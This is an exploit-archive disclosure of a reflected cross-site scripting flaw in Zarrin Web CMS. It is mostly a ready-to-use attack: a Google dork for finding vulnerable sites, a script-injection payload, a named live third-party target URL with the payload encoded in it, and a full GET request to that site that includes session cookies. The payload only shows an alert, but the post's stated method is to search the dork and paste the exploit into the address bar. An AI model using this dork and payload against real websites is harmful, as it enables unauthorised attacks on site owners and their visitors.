Zarrin Web cms Cross Site Scripting vulnerability

2017.11.13
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title ; Zarrin Web cms Cross Site Scripting vulnerability [+] Date : 2017-11-12 [+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS [+] Vendor Homepage : http://www.zarrinweb.com/ [+] Dork : intext:"طراحی ، توسعه و بهینه سازی شده توسط زرین وب" [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : https://telegram.me/WebServer [+] Poc : [!] Search Dork on google and add exploit to Address bar [+] Vulnerability File: [!] search.php [+] Exploit : [!] "></script><script>alert('0P3N3R');</script> [+] Target : [!] http://www.goller.ir/shared/tags.php?tags_page&ERROR=%D9%86%D9%81%D8%AA%22%3E%3C/script%3E%3Cscript%3Ealert(%270P3N3R%27);%3C/script%3E [+] Request : GET /shared/tags.php?tags_page&ERROR=%D9%86%D9%81%D8%AA%22%3E%3C/script%3E%3Cscript%3Ealert(%270P3N3R%27);%3C/script%3E HTTP/1.1 Host: www.goller.ir User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=dn8218sbtm8g5p1hckkjv2apa6; _ga=GA1.2.2003391358.1510506074; _gid=GA1.2.2142676411.1510506074 Connection: keep-alive Upgrade-Insecure-Requests: 1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top